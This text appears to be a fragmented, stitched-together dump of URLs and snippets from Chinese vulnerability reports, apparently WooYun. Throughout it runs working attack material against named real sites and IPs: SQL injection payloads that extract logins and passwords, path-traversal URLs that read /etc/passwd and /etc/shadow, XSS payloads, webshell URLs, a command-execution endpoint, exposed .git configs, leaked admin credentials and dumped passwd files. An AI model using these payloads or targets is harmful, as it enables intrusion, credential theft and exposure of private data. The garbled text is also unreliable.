eeemotion:x:1203:1203::/home/eeemotion:/bin/false hkctrcc:x:1205:1205::/home/hkctrcc:/bin/false cashflow:x:1206:1206::/home/cashflow:/bin/false gkts:x:1207:1207::/home/gkts:/bin/false ef7com:x:1208:1208::/home/ef7com:/bin/false hkahhk:x:1209:1209::/home/hkahhk:/bin/false hkaheng:x:1211:1211::/home/hkaheng:/bin/false snuface:x:1212:1212::/home/snuface:/bin/false 
mah123:x:1213:1213::/home/mah123:/bin/false foster:x:1215:1215::/home/foster:/bin/false justbcom:x:1218:1218::/home/justbcom:/bin/false maheng:x:1219:1219::/home/maheng:/bin/false pmca:x:1221:1221::/home/pmca:/bin/false clubleague:x:1222:1222::/home/clubleague:/bin/false successmkt:x:1224:1224::/home/successmkt:/bin/false zzsoncom:x:1226:1226::/home/zzsoncom:/bin/false embactr:x:1227:1227::/home/embactr:/bin/false nsconcept:x:1229:1229::/home/nsconcept:/bin/false hk5gctr:x:1230:1230::/home/hk5gctr:/bin/false hk5gcom:x:1231:1231::/home/hk5gcom:/bin/false eshop:x:1232:1232::/home/eshop:/bin/false femcaremed:x:1233:1233::/home/femcaremed:/bin/false test1:x:1234:1234::/home/test1:/bin/false https://**.**.**.**/exploits/39033/)执行php反弹shell命令: http://**.**.**.**:9001/ http://**.**.**.**:9001/jmx-console/ http://**.**.**.**:9001/payload/ http://**.**.**.**:9001/test/ http://**.**.**.**/info_page.jsp?plmjc=zgpdw http://**.**.**.**/qywh.jsp?plmjc=qywh http://**.**.**.**/zt_page.jsp?lmmc=zt_ddby http://**.**.**.**/info_page.jsp?plmjc=zgpdw http://**.**.**.**/manager/ http://**.**.**.**/news.rar http://**.**.**.**/1.zip http://**.**.**.**/2.php http://ftx.bai.sohu.com/bcastr.swf?bcastr_xml_url=xml/bcastr_v1.xml http://bai.sohu.com/app/forum/list/index.do?discussion=201#/app/forum/post/index.do?discussion=201&subject=456647 http://bai.sohu.com/app/forum/list/index.do?discussion=201#/app/forum/post/index.do?discussion=201&subject=456680 http://ftxbasketball.blog.sohu.com/ http://bai.sohu.com/app/forum/list/index.do?discussion=201 http://**.**.**.**/admin/login.asp http://**.**.**.**/ URL:http://www.hcznb.com/ https://www.hcznb.com/forget.html http://cloud.letv.com/note http://s3.lecloud.com/27801582-noteshare/39a9a328-ceb3-40c3-bd86-3c7336645889 http://**.**.**.**/hot_news01.asp?id=300 http://**.**.**.**:8088/hecprod/ http://i.apps.v1.cn/cs/app/Querynewversion.html http://www.scyd360.com/product.php http://**.**.**.**/bugs/wooyun-2015-0122523 
http://www.zf_**.**.**.**/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soapenc="http://**.**.**.**/soap/encoding/ xmlns:tns="http://**.**.**.**/ xmlns:types="http://**.**.**.**/encodedTypes xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body soap:encodingStyle="http://**.**.**.**/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_**.**.**.**/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope http://cms.s.the9.com/Index/index http://www.100credit.com/kind.php?k=1&id=48%20and%201=1-- http://www.100credit.com/kind.php?k=4&s=2&id=85&pid=51 url:http://r.m.baidu.com/%3Cimg%20src=x%20onerror=alert%28domain%29%3E http://**.**.**.**/employer/showdetail.aspx?id=291932 http://**.**.**.**/suzhoubaweb/show/sj/ImgServlet?id= http://www.chinahr.com http://passport.chinahr.com/pc/findPwd http://**.**.**.**/laodong/index.asp http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/118.pic_hd_%E5%8C%97%E4%BA%AC%E4%BA%BA20111441708756.jpg http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/55555_zhenxin3601433995977.jpg http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/mini%E6%96%B0%E7%9A%84%E5%BC%80%E5%8F%91%E5%95%86%E8%90%A5%E4%B8%9A%E6%89%A7%E7%85%A7%E6%89%AB%E6%8F%8F%E4%BB%B6_GPc3772105731448092534.jpg http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/id_rsa_ZKt6602240841449111282.txt http://www.iqegg.com www.iqegg.com http://**.**.**.**/promotions_show.asp?id=244存在注入漏洞 http://**.**.**.**/manage/AdminLogin.asp http://qz6666.com/4.html http://www.21cake.com/passport-login.html这个是主站登录的地方,一开始没有验证码,出错一定次数之后就出来了验证码: http://api.iqegg.com/interface.php?m=user&a=login http://pos.manwahgroup.com http://meeting.oppo.com/SaleStat/Login.aspx http://**.**.**.**/agoda/city_hotels.php?city=taipei 
http://konkek2.com:8080/LoadUsername/ikonke/xx.do?userid=0271110238 http://**.**.**/service.phpid=14 http://**.**.**.**/index/list?topic=0&sortid=13 http://**.**.**.**/schoolnewsdetil.asp?pid=10413 http://**.**.**.**/schoolnewsdetil.asp?pid=18764 http://**.**.**.**/schoolnewsdetil.asp?pid=18763 http://**.**.**.**/eventsdetil.asp?pcountid=18242 http://smsrc.sina.com.cn/wappush/dumpSourceDownld.php?file=../../../../etc/passwd http://smsrc.sina.com.cn/wappush/dumpSourceDownld.php?file=../../../../etc/shadow%00 http://smsrc.sina.com.cn/wappush/dumpSourceDownld.php?file=../../../../data0/apache/share/htdocs/config.php http://1.202.246.153:7001/ http://218.247.188.69:81 http://**.**.**/ http://gift.airchina.com.cn/已经关闭。 http://gift.airchina.com.cn:8087/确可以照常使用。 http://219.146.249.179/ http://**.**.**.**/inter_sys/login.jsp http://tao.kaiyuan.eu/?page=4&u=1 http://**.**.**.**/ http://**.**.**.**//messager/users.data http://www.crc-bj.com/service.aspx?s=21 http://h5.cmge.com/admin http://**.**.**.**/ycczj/news/downInfo?num=0&title=&deptid= http://source.wanglibao.com/monthly.php?action=detail&project_id=2619 http://**.**.**.**/ http://**.**.**.**/Ajax/users.ashx    post请求 cookie:pyerpcookie=loginname=admin&truename=系统管理员&flag=1&datagroup=all&kefugroup=总经办&kpgroup=0&kpdian= coding:utf-8 http://narrow.9588.com/main/City/NewHotelSpecialPrice?cityCode=SHH&cityName=D http://**.**.**.**:8090/NewsPrice/html/comm/login.jsp http://m.mizhe.com/resource/get_acs_config.html?platform=download_app http://bm.joyoung.com/api/exchange/discuz/search/37p1 http://bm.joyoung.com/bbs/list/f37 http://bm.joyoung.com http://219.245.18.46/ http://219.245.18.46/yii/ http://219.245.18.46/yii/.git/ http://219.245.18.46/xmgl/ http://219.245.18.46/%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/ http://lib.nwu.edu.cn/Read.Asp?NewsID=1839 http://lib.nwu.edu.cn/Read.Asp?NewsID=1839 http://**.**.**.**:7005/login.jsp,IP地址:**.**.**.**),是浙江省工商行政管理局旗下业务平台,由浙江浙大网新中研软件有限公司做技术支持。该平台存在Weblogic 
http://**.**.**.**/bugs/wooyun-2015-0164278 http://122.224.66.140/redmine/ http://**.**.**.**/dtwz/indexAction.ndo?action=showindex http://**.**.**.**/ http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://**.**.**.**/family/newlist.php?nid=6 http://chenxi.fudan.edu.cn/admin/login.action root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin http://www.mtotrade.com/user/restpwdp http://**.**.**.**/ http://**.**.**.**/html/product_main.asp?pid=3 http://**.**.**.**/bbs/ http://**.**.**.**/bbs/faq.php?action=gro http://meeting.lube.sinopec.com/Public/checkLogin.html http://meeting.lube.sinopec.com http://**.**.**.**/.git/config http://**.**.**.**/.git/config http://www.emao.com/index.php?r=zhuanti/chengdu/chengduvote http://218.5.84.14:8000/gpms/logon.jsp http://218.5.84.14:8000/console http://**.**.**.**/login/index.action http://**.**.**.**/save/txt.jsp http://**.**.**.**/s/industry_news_details.php?itemid=479&page=1 http://**.**.**.**/s/corp_news_details.php?itemid=455&page=01 http://**.**.**.**/s/corp_news_details.php?itemid=456 http://**.**.**.**/Upfiles/xiaobai.asp http://**.**.**.**/,图中标识存在漏洞 http://**.**.**.**/存在“Java 
http://**.**.**.**/jmx-console/tst.jsp密码123 inurl:mecms http://**.**.**.**/mecms/common/login.jsp http://**.**.**.**/zh/showcase-chi/item/on-hing-website-revamp http://**.**.**.**/mecms/common/login.jsp http://**.**.**.**/eng/works/index.jsp?cate=cms http://**.**.**.**/mecms http://**.**.**.**/eng/works/index.jsp?cate=cms http://**.**.**.**/mecms http://**.**.**.**:9080/存在“Java localhost:1521 http://**.**.**.**/zys/search/?action=list&bid=0&key=1 http://**.**.**.**/scripts/Regccm_inview-e.asp?colid=2t http://**.**.**.**/03/chat/msglist.asp?id=12455 http://**.**.**.**/存在“Java http://**.**.**.**/存在“Java http://gyzc.zjicm.edu.cn/index.jsp?columnsid=123&dotype=perList http://**.**.**.**/,图中标识链接存在漏洞 http://jingang.yto56.com.cn/exptrack/logout.action http://www.jbestore.com/ http://kf.joyoung.com/listT_jubao.action http://**.**.**.**/index/wjb/code_getCodeFront.action http://**.**.**.**/index/wjb/login_getNew.action http://**.**.**.**/index/wjb/login_login.action http://**.**.**.**/sysuser/user_relogin.action http://xingzuo.chuchujie.com http://122.11.37.124/.svn/entries http://life.easou.com/?a=addLove&id=8&s=channel http://219.143.118.86/Login.aspx http://**.**.**.**/wanren/post/companyAction!doViewPost.action?compostForm.f_Comid=1990 http://v.kuaidadi.com/point?cityId=1101001&scope=city&date=0&dimension=distribute&num=300 http://v.kuaidadi.com/point?cityId=11010%2701&scope=city&date=1&dimension=distribute&num=300 http://extplat.minanins.com:9001/console/ http://mail.minanins.com:9001/console/ http://extplat.minanins.com:9001/jspspy/index.jsp?o=index http://extplat.minanins.com:9001/console/ http://extplat.minanins.com:9002/console/ http://mail.minanins.com:9001/console/ http://58.251.18.196:9002/console/ http://58.251.18.196:9001/console/ http://www.ttkexpress.us/Page/Logistics/InspectMessage.aspx?StorageNumber=1 http://60.174.207.99:80/ http://60.174.207.99:80/console http://www.thinkphp.cn/topic/35973.html http://**.**.**.**/yhzx/base/login http://**.**.**.**/gip 
http://jzt2.58.com/api/guest/v21/vip/info?cityid=358164604%20or%201=1&lat=22.6204214&lng=114.0728613&r=-1820211705 http://jzt2.58.com/api/guest/v21/vip/info?cityid=358164604%20or%201=2&lat=22.6204214&lng=114.0728613&r=-1820211705 http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11不知道之前有没有被其他人提交过,就算提交过装了waf修复了,我们现在来绕过waf http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,1,1%29%29%29%3C105%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,1,1%29%29%29%3E100%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,1,1%29%29%29=101%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,3,1%29%29%29=111%20waitfor%20delay%20%270:0:3%27-- http://m.dwzq.com.cn/dwzq_front/myInfo/getPage http://**.**.**.**/zwcx/daoyou.jsp?&page=1 http://**.**.**.**/single_info/selectlogin_1.asp http://soft.t3.com.cn/ mqqwpa://im/chat?chat_type=wpa&uin=QQ号码&version=1&src_type=web&web_src=&name=0 http://**.**.**.**/,图中链接存在多个漏洞 http://www.fashionguide.com.tw http://club.jr.jd.com/topic/618751&orderBy=*&pageNo=* http://114.251.127.80/zym/rbkj.nsf http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598 https://**.**.**/checkDrm.action https://**.**.**/bak1.jsp http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11 
http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%28ascii%28substring%28system_user,1,1%29%29%29=115%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%28ascii%28substring%28system_user,2,1%29%29%29=97%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/b2c/products/products_show.php?pid=5688 http://**.**.**.**/admin http://xueshu.baidu.com/s?wd=paperuri%3A%284a9cb4a895e665c048089b2b3a78e1cf%29&filter=sc_long_sign&tn=SE_xueshusource_2kduw22v&sc_vurl=http://www.icid-icloud.com/&ie=utf-8 http://monitor.jlu.edu.cn/cacti/graph_view.php?action=tree&tree_id=9&leaf_id=152 http://monitor.jlu.edu.cn/cacti/graph_view.php?action=tree&tree_id=4 http://**.**.**.**:80/ http://**.**.**.**/ec-web/toGoLogin.action http://**.**.**.**/ec-web/findPassword/findPasswordOne.action http://**.**.**.**:80/ http://**.**.**.**/ https://**.**.**.**:8880/ ORA:SQL语句未正确结束。 http://app.hanweb.com.cn/ ip:221.231.137.195 https://221.231.137.195:8880/ http://124.65.80.190:8081/venus/ http://**.**.**.**/WebTAS/TchQuery/tchWriQueryResult.aspx?academic=2&dept=UMT&teacherName=8141991&writingKind=&deep=G http://**.**.**.**/crn-webapp/mag/coluOutlineSL.jsp?coluid=36&type=ykzkjp http://**.**.**.**:8081/hyggfwxt/login.jsp http://221.224.2.77:10000/ http://219.145.103.100:10000 http://www.sy-yy.com/admin/login.aspx http://120.197.138.35/会跳转至http://book.easou.com/ http://120.197.138.35:8080/端口存在resin http://120.197.138.35:8080/resin-doc/shell.jsp http://**.**.**.**/ http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/tld/Default.aspx http://**.**.**.**/ebook/ebookpage.php?book=Fl http://**.**.**.**/html/application.asp?appid=1 
http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=********* http://wltest.wanglibao.com/ylb/monthly.php?action=detail&project_id=2628 http://**.**.**.**:8081/czggfwxt/login.jsp http://member.95081.com/checkNum/checkMessage!checkMessage.action?loginName=-1 http://**.**.**.** http://**.**.**.**/orthopedics/download.php?name=../../orthopedics/download.php http://**.**.**.**/orthopedics/download.php?name=../../lib/dbkeyfunc_mysql/dbkeyfunc_mysql.inc.php http://**.**.**.**/webs/xwzx.aspx?fl=qyzx&pid=3 http://kfgl.hasee.com dynamic.app.m.v1.cn/www/dynamic.php?mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302&p=0 http://**.**.**.**:8090/sionline/ http://fwupdate.ruijie.com.cn/login.htm帐号admin密码admin后台很高尚怪我读书少 https://res.mail.qq.com/zh_CN/htmledition/images/emoji32/3297.png http://**.**.**.**:8022/siteRoot/bxfwdt/xxgk/tzgg/9897283390.html http://www.dianping.com/shop/57194925/edit http://www.dianping.com/member/315257742 http://www.dianping.com/help/search/%3Csvg/onload=alert%281%29%3E index.php/help/viewmsg?nid=5 http://**.**.**.**/account2/reg.aspx?regtype=0 http://**.**.**.**/interfaces/doit.aspx?act=checkusernameexist&username=test11 http://software.twt.edu.cn/ https://**.**.**.**/webapp/wcs/stores/servlet/WFJOrderToCancelCmd?orderId=282067382&subOrders=282067382-1&reason=7&reasonString=%E8%AE%A2%E5%8D%95%E4%BF%A1%E6%81%AF%E6%9C%89%E8%AF%AF&storeId=10154&catalogId=10101&langId=-7&errorViewName=WFJAjaxErrorView http://**.**.**.**:8084/sionlineman/ http://**.**.**.**/b2c/products/index.php?cid=2 http://www.zbird.com/pointgift/memberinfo http://m.zbird.com/member/ http://www.zbird.com/pointgift/memberinfo http://m.zbird.com/ www.fxtrip.com http://www.fxtrip.com/account/resetpwd.php http://**.**.**.**/ http://220.194.33.79:7001/存在“Java http://**.**.**.**/ https://**.**.**.**/tylgl/jr/blob/ab289ca912e8a6316255d399d3033de5bd14c661/src/main/java/com/thinkgem/jeesite/common/utils/Mail.java http://**.**.**.**:7001/存在“Java 
http://passport.familydoctor.com.cn/reg/ajax/RegService.ashx?FunctionName=ChickNickName&clientid=nickname&rand=1451834255173&nickname=CasterJs&email=CasterJs&_=1451834251172 http://114.80.178.225:7001/console http://**.**.**.**/ http://dcc.whut.edu.cn/webfuck_shell.jsp http://pub2.whut.edu.cn/autodsh/shownews.asp?id=938&type=%B6%AD%CA%C2%BB%E1%B6%AF%CC%AC http://svt.whut.edu.cn/search.asp http://acm.sdut.edu.cn/Web/shownews.php?nid=24 http://**.**.**.**/htglxt/Admin_Index.asp http://**.**.**.**/ODSMSPortal/app/login!logout.action http://**.**.**.** http://**.**.**.**:8080/j_acegi_security_check http://**.**.**.**:8080/j_acegi_security_check http://**.**.**.** http://**.**.**.**/site/index.html http://**.**.**.**/user/register/shareLevel/2.html http://**.**.**.**/user/verifyusername?userName=mayanqi0610@**.**.**.** http://writing.pku.edu.cn:82/trp/?q=bold%20type/amn http://w.ebaoyang.cn/ http://info.easou.com/admin/ums/logon.jsp http://info.easou.com/admin/FCKeditor/editor/dialog/fck_about.html http://info.easou.com/admin/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://info.easou.com/admin/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/Image http://info.easou.com/admin/FCKeditor/upload/Image/JspSpyJDK5.jsp?o=index http://www.docin.com/app/jump_adv/pay_vip.do?channelid=0313&buyVipFrom=4 http://**.**.**.**/ajax/usersajax.asmx http://opinion.e23.cn/so.html?k=1&p=21&type=title http://a6.gykghn.com:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.** http://**.**.**.**/zjzc//ZtbInfo/XJZBGG.aspx?ProjectGuid=941b0b7c-8d4c-4cb0-93c2-ad99fd54a1a7&ZhongBiaoGGGuid=89401815-9d6f-4c10-ae20-233404872d88 http://**.**.**.**/zh/servicelist.php?nid=2 http://www.bilibili.com/tag/WORKING!!!/ http://www.bilibili.com/api_proxy?app=tag&action=/tags/subscribe_add http://m.zbird.com 
http://m.zhongmin.cn/WAP/QuickLogin.aspx?returnUrl=http%3a%2f%2fm.zhongmin.cn%2fWAP%2fUserIndex.aspx http://shop.cdev.emaotai.cn/ http://fenxiao.lvmama.com/ http://wooyun.org/bugs/wooyun-2015-0149748 http://wooyun.org/bugs/wooyun-2015-0161249 http://fenxiao.lvmama.com/home/prod_log.jsp?d=2015-12-30&s=0 http://fenxiao.lvmama.com/home/prod_log.jsp?d=2015-12-30&s=1 http://**.**.**.**/product.php?pid=507 https://github.com/bellsy/edaixi/blob/330c80b1a35489090a13c50c2b04ad531ead6f40/jd/wuliu/zhanghaodenglu.py http://mail.bjmu.edu.cn/coremail/index.jsp?cus=1&sid=BAAGNwUUFcOZhrRrGqUUYUfpKFXimCTX http://**.**.**.**/login/Login.jsp?logintype=1 picc.sz/88888 http://115.182.9.39/mp/login.html chang:123456 http://133836.ohocn.com http://133836.ohocn.com http://**.**.**.**/index.html http://dabao.muzhiwan.com/admin http://ceagent.ceair.com/ http://svc.ceair.com/ http://comment.10jqka.com.cn/api/stock/index.php?module=concept&code=885709 http://oa.hasee.com/ http://oa.hasee.com/funcon/help/read_help.php?HELP_ID=236 http://**.**.**.**/zfwj/detail.asp?ID=2432 www.hasee.com/Chinese/drivers/drivers/index.php/Download/Index/model.html?id=174 http://oa.sino-tcm.com/yyoa/ http://oa.sino-tcm.com/yyoa/checkWaitdo.jsp?userID=1 http://www.leishen.cn/phpinfo.php http://www.leishen.cn/.git/config https://git.coding.net/leishen/web.git https://git.coding.net/leishen/web.git http://m.leishen.cn/listshow.php?id=22&cid=6 http://**.**.**.** http://video.e23.cn/programs/view/postcomment.shtm?gb_text=1&submit=%d0%b4%c9%cf%c8%a5&vid=-1 http://m.fxtrip.com/weixin/qrcode_user&userstr=u_31776&callback=jQuery17205261112812440842_1451954382374?_=1451954395534 http://**.**.**.** http://www.ylwxgw.com/Personal/OrderDetail?orderid=544 http://www.ylwxgw.com/Personal/OrderDetail?orderid=49 http://www.ylwxgw.com/Personal/OrderDetail?orderid=53 http://**.**.**.**/ftadmin/login.php?gotopage=%2Fftadmin%2F http://**.**.**.**) http://oa.envisioncn.com http://oa.envisioncn.com/tk/tx.jsp http://**.**.**.**:8080 
http://www.wanlitong.com/ http://**.**.**.**/admin/zhxx_dwlogin.do https://**.**.**.**/invoker/JMXInvokerServlet root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin jboss:x:501:501::/home/jboss:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin lch:x:502:0::/home/lch:/bin/bash http://**.**.**.**/exhibitionDetail.asp?id=3253 http://open.muzhiwan.com/ http://open.muzhiwan.com/index.php?action=public&opt=update_email http://**.**.**.**/login.action http://act.wanxue.cn/plugin.php?action=../../../../../../../../../etc/passwd%00&id=dc_mall http://**.**.**.** http://**.**.**.**/car/a.jsp http://life.ufh.com.cn/list.php?a_id=1 http://**.**.**.**/在搜索图书处存在SQL注入,注入点为“queryText”,post包如下: http://**.**.**.**/invoker/JMXInvokerServlet http://218.16.100.212:8080/status?full=true http://218.16.100.212:8080/is/ http://**.**.**.**/News/news-more.php?id=704 http://**.**.**.**/News/news-more.php?id=704 http://www.hebtaikang.com/泰康人寿河北分公司官网服务器由于websphere反序列化漏洞,导致服务器getshell。 http://**.**.**.**/ http://**.**.**.**/index.portal http://**.**.**.**/userAttributesView.portal在目标链接 http://**.**.**.**/userAttributesView.portal?userId=amAdmin http://www.bs.ecnu.edu.cn/index.asp 
http://www.bs.ecnu.edu.cn/gonggao.asp?id=200 http://www.bs.ecnu.edu.cn/newshow.asp?id=1760 http://www.bs.ecnu.edu.cn/newshow.asp?id=1745 http://www.bs.ecnu.edu.cn/newshow.asp?id=1745 http://**.**.**.**/.git/ http://**.**.**.**/api/svn_host.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://lofbill.com/shopView.php?id=22 http://lofbill.com/service.php?id=30&act=1&flag=4 user:admin pwd:wooyun012(oldpwd:admin) http://**.**.**.**/customer/site?province=-1&city=-1&keyword=1 http://sh.niu.com/ http://www.snet.com.cn/cms/turnpage/turnpagesearch_en.jsp URL:http://**.**.**.**/hospital/clinic_expert.jsp?hospitalid=&hosid=2 http://121.193.130.83:7001/ http://**.**.**.**:7001 webshell:http://**.**.**.**:7001/resources/test.jsp http://**.**.**.**:8080/axis2/services/Cat/exec?cmd=whoami http://www.becod.com/order/pay?orderid=1329804 http://manage.ezucoo.com/erc/login.action http://www.huainanhai.com/login/forget?back_url=http%3A%2F%2Fwww.huainanhai.com%2F http://**.**.**.**/NewsFiles/NewsDetail.asp?NewsID=806 http://**.**.**.**/manage/adminlogin.asp http://idm.pku.edu.cn/officeadmin/masterlogon.asp http://idm.pku.edu.cn/admin/ http://www.hasee.net/member/memberinfo.aspx http://www.hasee.net/uploadfiles/images/memberhead/201601051623308186.asp http://**.**.**.**/ http://**.**.**.**/info.php http://**.**.**.**/phpmyadmin/ http://kfgl.hasee.com/lookup/bios/bios_t.asp?type_id=24 http://218.16.100.212:8080/gionee/ https://secure.yxb.com/findPwd.do?typeNo=1 http://**.**.**.**/ http://**.**.**.**/jk/dangban/file.asp?fileid=1011179 http://**.**.**.**/oa/index.asp http://123.127.225.173/getServiceStation.page?cityName=111 webserver:jetty http://www.kela.cn 
http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105751366/pay_mod/1/order_payment_sn/2016010575136619685?&bank_type=0&discount=0&fee_type=1&input_charset=GBK¬ify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105514347/pay_mod/1/order_payment_sn/2016010551434711072?&bank_type=0&discount=0&fee_type=1&input_charset=GBK¬ify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b http://**.**.**.**/bugs/wooyun-2010-091669发现 http://**.**.**.**/ http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://scs.boyaagame.com/ http://oa.tup.tsinghua.edu.cn/hotoa/logon/logon/index.cfm http://ji.gfan.com:8080/ http://117.79.80.15:8080/ http://**.**.**.**:8084/ http://ecases.medlive.cn/ https://webmail.cyou-inc.com/owa https://vpn.cyou-inc.com/por/login_psw.csp?rnd=0.7370990256313235#https%3A%2F%2Fvpn.cyou-inc.com%2F http://**.**.**.**:8080/admin-console/已被删除 http://**.**.**.**:8080/jmx-console/却未授权访问 http://app.emao.com/v1.4/ http://**.**.**.**/1753327242/t/3/id/133744* filetype:pwd http://**.**.**.**/site_item_list_4.php?site_map_item_id=16* http://211.144.132.45:8787/ 
http://www.dzqh.com.cn/contest/detail_more_news.do?p1=960&tag5=1483&targetPage=more_news_contest URL:sqlmap http://**.**.**.**/search_list.aspx?url_key=% http://diy.haier.com:80/ http://115.236.35.212/szaccord/login/LoginFail.do http://**.**.**.** http://115.236.35.214/yyoa/index.jsp http://**.**.**.**:7001/存在“Java http://219.141.203.166 http://passport.emao.com/login/?backUrl=http%3A%2F%2Fwww.emao.com%2F#login_wrap http://202.108.103.169/htweixin/ http://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001577 http://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001576 http://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001578 http://test.99.com http://test.99.com/ http://zx.qcplay.com/Data/details/id/-1 http://erelaw.tsinghua.edu.cn/login.asp http://erelaw.tsinghua.edu.cn/Edit/UploadFile/a.asp http://b2b.emaotai.cn/HR/ http://218.16.100.212:8080/gionee/weibo/imeiManager!list http://218.16.100.212:8080/gionee/ http://218.16.100.212:8080/gionee/home.jsp http://218.16.100.212:8080/gionee/weibo/imeiManager!list http://219.141.203.167 url:http://**.**.**.**/m1/login.do?message=Login.nouser mis.ss.pku.edu.cn/news/download.jsp?fileName=../../../../../../../../../../../etc/shadow http://tongji.easou.com/ http://**.**.**.**/ jboss-5.1.0.GA/server/default/conf/props/jmx-console-users.properties http://jpk.cust.edu.cn/gxcl/admin/ 